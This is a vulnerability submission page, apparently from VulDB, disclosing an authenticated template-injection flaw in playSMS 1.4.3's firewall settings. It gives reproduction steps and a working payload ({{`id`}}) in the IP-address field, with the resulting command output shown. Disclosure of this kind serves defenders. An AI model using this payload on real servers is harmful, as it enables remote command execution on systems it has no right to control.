Submit #363730: playSMS 1.4.3 Server Side Template Injection (SSTI)情報

TitleplaySMS 1.4.3 Server Side Template Injection (SSTI)
DescriptionPlaySMS 1.4.3 has authenticated Server Side Template Injection in Manage firewall. The manipulation of the argument IP addresses, that leads to a Authenticated RCE 1. Authenticate in login page http://192.168.1.20/playsms/index.php?app=main&inc=core_auth&route=login 2. Click in Settings > Manage firewall (/index.php?app=main&inc=feature_firewall&op=firewall_list) 3. Click in Plus (+) icon to add new rule 4. Add payload {{`id`}} in "IP addresses " field and add an user field "Select username" 5. Save and back to Settings > Manage firewall http://172.16.1.195/playsms/index.php?app=main&inc=feature_firewall&op=firewall_list&search_keyword=&search_category=&page=1&nav=1 <tbody> <tr> <td>admin</td> <td>uid=33(www-data) gid=33(www-data) groups=33(www-data) </td> <td> <input type=hidden name=itemid[0] value="7"> <input type=checkbox name=checkid[0]> </td> </tr>
Source⚠️ https://github.com/playsms/playsms/tree/master/storage/application/plugin/feature/firewall
User
 Dhimitri (ID 45045)
Submission2024年06月25日 01:03 (3 months ago)
Moderation2024年07月03日 07:29 (8 days later)
Status承諾済み
VulDB Entry270277
Points20

Might our Artificial Intelligence support you?

Check our Alexa App!